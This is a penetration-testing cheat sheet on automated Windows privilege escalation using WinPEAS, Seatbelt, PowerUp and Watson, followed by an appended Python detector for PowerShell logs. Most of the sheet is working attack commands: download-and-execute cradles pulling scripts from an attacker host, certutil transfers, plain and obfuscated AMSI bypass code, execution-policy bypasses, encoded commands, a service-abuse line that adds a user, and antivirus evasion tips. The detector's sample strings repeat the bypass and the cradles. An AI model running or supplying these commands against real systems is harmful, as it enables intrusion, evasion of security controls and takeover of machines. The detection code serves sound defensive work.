🛡️ Methodology Checklist
- Bypass AMSI if needed before running PS-based tools
- WinPEAS: winpeas.exe > out.txt — focus on red+yellow findings
- Seatbelt user audit: Seatbelt.exe -group=user
- Seatbelt system audit: Seatbelt.exe -group=system
- PowerUp: Invoke-AllChecks — note services and registry findings
- Watson: run for missing patches leading to LPE
- Manually verify all high-confidence automated findings
- Cross-reference with manual checklist items before proceeding
🎯 Operational Context
Use when: Windows foothold obtained — run automated tools (WinPEAS, PowerUp, Seatbelt) to enumerate privilege escalation paths faster than manual checks.

Think Dumber First: WinPEAS first — it covers 90% of what PowerUp and Seatbelt cover, plus more. Red output = high confidence privesc. Then PowerUp for unquoted service paths and weak registry perms specifically.

Skip when: EDR will catch automated tools — run individual manual commands from Windows_PrivEsc_Enumeration instead.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| .\winPEASx64.exe | Full automated Windows PrivEsc enumeration |
| .\winPEASx64.exe quiet systeminfo userinfo | WinPEAS focused on system + user info sections only |
| .\SharpUp.exe audit | Focused: weak service permissions, unquoted paths, DLL hijacks |
| .\Seatbelt.exe -group=all | Seatbelt: extensive host situational awareness |
| .\Seatbelt.exe -group=user | Seatbelt: user-focused checks (saved creds, history, RDP) |
| Import-Module .\PowerUp.ps1; Invoke-AllChecks | PowerShell port of SharpUp — misconfig checks (the script must be imported or dot-sourced, not just run, or its functions are not in scope) |
| Import-Module .\Sherlock.ps1; Find-AllVulns | Deprecated but comprehensive missing patch finder |
| .\Watson.exe | Modern missing patch finder (replaces Sherlock) |
| certutil -urlcache -split -f http://[LHOST]/[TOOL] C:\temp\[TOOL] | Transfer tool via certutil (usually allowed) |
| IEX(New-Object Net.WebClient).DownloadString('http://[LHOST]/PowerUp.ps1') | In-memory PowerShell tool execution |
| powershell -ep bypass -c "IEX(IWR http://[LHOST]/PowerUp.ps1 -UseBasicParsing)" | Bypass execution policy + download + execute |
🔬 Deep Dive & Workflow
WinPEAS — Key Output Sections
```text
[+] SYSTEM INFO → OS/build version → patch search
[+] AV/EDR → Windows Defender status, AMSI
[+] USER INFO → whoami /priv + /groups + net user
[+] PROCESSES → non-standard SYSTEM processes
[+] SERVICES → modifiable, unquoted paths, DLL hijack candidates
[+] DLL HIJACKING → potential DLL hijack paths
[+] NETWORK → listening ports, ARP, routing
[+] CREDENTIALS → SAM, LSA secrets, vault, registry
[+] FILES → unattended, config, scripts with passwords
```
Color coding:
- Red+Yellow = HIGH confidence finding
- Red = medium confidence
- Yellow = interesting info
- Green = current user info
Run order: WinPEAS first (broad), SharpUp second (targeted service abuse), Seatbelt third (credential artifacts).
WinPEAS Transfer & Execution
```powershell
# Option 1: certutil (most reliable, usually not blocked)
certutil -urlcache -split -f http://[LHOST]/winPEASx64.exe C:\temp\winPEASx64.exe
.\winPEASx64.exe | Out-File C:\temp\winpeas_output.txt
# Option 2: PowerShell WebClient
(New-Object System.Net.WebClient).DownloadFile('http://[LHOST]/winPEASx64.exe', 'C:\temp\winpeas.exe')
# Option 3: In-memory (no disk touch — PowerShell version only)
IEX(New-Object Net.WebClient).DownloadString('http://[LHOST]/winPEAS.ps1')
# Option 4: SMB share (if SMB allowed)
net use Z: \\[LHOST]\share /user:guest ""
Z:\winPEASx64.exe
```
Seatbelt — Targeted Checks
```powershell
# Full run
.\Seatbelt.exe -group=all -full -outputfile=C:\temp\seatbelt.txt
# User artifacts (fastest for cred hunting)
.\Seatbelt.exe -group=user
# → Chrome/Firefox saved logins, RDP saved sessions
# → PSReadLine history, recent files, MRU lists
# System checks (for privesc vectors)
.\Seatbelt.exe -group=system
# → Services, scheduled tasks, UAC level, AppLocker
# Credential checks
.\Seatbelt.exe CredEnum WindowsVault CredentialFiles
```
PowerUp — Service Abuse Automation
```powershell
# Import + run all checks
Import-Module .\PowerUp.ps1
Invoke-AllChecks
# Or targeted functions:
Get-ModifiableServiceFile        # writable service binary
Get-ModifiableService            # modifiable service config
Get-UnquotedService              # unquoted service paths
Get-ModifiableRegistryAutoRun    # writable HKLM\Run entries
Get-CachedGPPPassword            # Group Policy Preferences passwords
# Auto-exploit (if found):
Invoke-ServiceAbuse -Name 'VulnSvc' -Command 'net user [USER] [PASS] /add'
```
Watson — Missing Patches
```powershell
# Check for unpatched privilege escalation vulnerabilities
.\Watson.exe
# → Based on OS version + installed patches
# → Lists CVEs with EDB links
# Cross-reference with:
wmic qfe list | findstr KB[NUMBER]   # verify specific KB installed
```
AMSI Bypass (When PowerShell Tools Are Blocked)
```powershell
# Basic AMSI bypass (run before loading tool)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# Or via obfuscation:
$a=[Ref].Assembly.GetType('System.Management.Automation.'+'Amsi'+'Utils')
$b=$a.GetField('amsi'+'InitFailed','NonPublic,Static')
$b.SetValue($null,$true)
# Then load tool normally
IEX(New-Object Net.WebClient).DownloadString('http://[LHOST]/PowerUp.ps1')
```
Execution Policy Bypass
```powershell
# Method 1: -ep bypass flag
powershell.exe -ep bypass -c "IEX(...)"
# Method 2: Scope override
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted
# Method 3: Bypass per-command
powershell -ExecutionPolicy Bypass -File .\script.ps1
# Method 4: Encode command
$cmd = "IEX(IWR http://[LHOST]/PowerUp.ps1)"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd)
$encoded = [Convert]::ToBase64String($bytes)
powershell -EncodedCommand $encoded
```
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| WinPEAS detected by AV | Default binary signature | Use PowerShell version via IEX from memory; or obfuscated binary from Veil |
| PowerUp.ps1 AMSI block | Script signature match | Load via obfuscated IEX; split the script across multiple download requests |
| Seatbelt times out | Too many checks | Run specific modules: Seatbelt.exe -group=user or Seatbelt.exe TokenPrivileges |
| Results too long to analyze | Terminal buffer overflow | Redirect: WinPEAS.exe > C:\Temp\pe.txt; transfer and review offline |
| No results returned | Tool crashed silently | Check: echo %ERRORLEVEL%; try running individual checks manually |
📝 Reporting Trigger
Finding Title: Automated Privilege Escalation Enumeration Identifies Exploitable Misconfiguration

Impact: Automated enumeration tools rapidly identify privilege escalation vectors including unquoted service paths, weak registry permissions, and token privilege abuse, enabling escalation from standard user to SYSTEM.

Root Cause: System not hardened against common Windows privilege escalation vectors. Automated tools trivially identify misconfigurations that would take hours of manual analysis.

Recommendation: Run WinPEAS/PowerUp against all Windows systems in your environment during regular hardening audits. Apply CIS Windows Server Benchmark. Implement automated misconfiguration scanning in vulnerability management program.
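As an added defensive counterpart to the AMSI bypass and execution policy bypass sections above (example code, not part of the original notes): a Python triage script over PowerShell Script Block Logging text (Event ID 4104, ScriptBlockText) that flags the AmsiUtils reflection bypass including its split-string form, IEX download cradles, and -EncodedCommand use, decoding the base64 UTF-16LE payload so the inner command is scanned as well. The sample script blocks and the 10.0.0.5 host are constructed.

```python
import base64
import re

# Rules for the techniques in the notes above. Matching runs on a normalised copy
# in which PowerShell string concatenation ('Amsi'+'Utils') has been collapsed.
RULES = {
    "amsi_bypass": re.compile(r"amsiutils|amsiinitfailed|amsiscanbuffer", re.I),
    "download_cradle": re.compile(
        r"\b(iex|invoke-expression)\b.*(downloadstring|downloadfile|invoke-webrequest|\biwr\b)", re.I),
    "encoded_command": re.compile(r"-e(c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I),
}

def normalise(text):
    # Collapse 'a'+'b' and "a"+"b" into one literal so split tokens still match.
    return re.sub(r"(['\"])\s*\+\s*\1", "", text)

def encode_command(text):
    # Base64 of UTF-16LE text, the form -EncodedCommand expects (builds the sample).
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(b64):
    # Inverse of encode_command; None when the token is not valid base64/UTF-16LE.
    try:
        return base64.b64decode(b64).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage(script_block):
    """Return the names of the rules that fire for one ScriptBlockText value."""
    hits = []
    text = normalise(script_block)
    m = RULES["encoded_command"].search(text)
    if m:
        hits.append("encoded_command")
        decoded = decode_encoded_command(m.group(2))
        if decoded:
            text += "\n" + normalise(decoded)  # scan the decoded payload as well
    for name, rx in RULES.items():
        if name != "encoded_command" and rx.search(text):
            hits.append(name)
    return hits

# Constructed sample ScriptBlockText values (Event ID 4104), not real captured logs.
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem C:\\temp | Sort-Object Length",
    "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static')",
    "$a=[Ref].Assembly.GetType('System.Management.Automation.'+'Amsi'+'Utils')",
    "IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.5/PowerUp.ps1')",
    "powershell -EncodedCommand " + encode_command("IEX(IWR http://10.0.0.5/PowerUp.ps1)"),
]
```

Feed real 4104 events through triage() one ScriptBlockText at a time; the first sample is clean and the rest each fire at least one rule.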